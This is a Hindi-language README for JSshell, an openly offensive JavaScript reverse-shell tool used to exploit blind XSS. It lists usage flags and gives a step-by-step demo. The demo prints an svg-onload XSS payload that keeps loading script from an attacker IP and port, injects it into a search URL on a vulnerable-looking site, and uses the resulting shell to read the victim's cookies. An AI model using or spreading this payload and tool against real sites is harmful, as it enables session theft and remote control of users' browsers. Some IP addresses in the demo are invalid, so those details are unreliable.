
JSshell - JavaScript रिवर्स/रिमोट शेल

JSshell - एक JavaScript रिवर्स शेल। इसका उपयोग दूरस्थ रूप से JS कोड निष्पादित करने, ब्लाइंड XSS का शोषण करने, ... के लिए किया जाता है।
आवश्यकताएँ: कोई भी OS + Python 2 या Python 3
JShell 3.1 के नए संस्करण में अद्यतन:
snippet -> जावास्क्रिप्ट कोड का एक स्निपेट लिखने की अनुमति देता है>>> snippet
Use CTRL+D to finish the snippet
function new() {
new = 'New update: Support javascript snippet =)';
confirm(new)
}
new()
>>>
<body> रिवर्स शेल पेलोड जोड़ा गया-g-p-s-w-cjsh.pyjsh.py -gjsh.py -p 1234jsh.py -s 48.586.1.23 -gjsh.py -c "alert(document.cookie)" -w 10यह JSshell का उपयोग करने के तरीके का एक चरण-दर-चरण उदाहरण है।
पहले, हमें एक रिवर्स JS शेल पेलोड जनरेट करना होगा और शेल टाइमआउट सेट करना होगा (जैसे 20 सेकंड):
~# whoami
root
~# ls
README.md jsh.py
~# python3 jsh.py -g -w 20
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0
Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>
Listening on [any] 4848 for incoming JS shell ...
अब इस पेलोड को वेबसाइट पर पेस्ट करें:
https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>
पेज तक पहुँचें और हमारे पास रिवर्स JS शेल होगा:
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0
Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>
Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help This help
exit, quit Exit the JS shell
$
कुछ कमांड निष्पादित करें:
$ var test = 'controlled'
$ confirm(test)
$
और एक अलर्ट पॉप अप होगा: controlled
$ prompt(document.cookie)
$
और ब्राउज़र उपयोगकर्ता कुकीज़ प्रिंट करेगा: JSESSION=3bda8...
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#
अब बाहर निकल गए!
इसे shelld3v द्वारा बनाया गया है!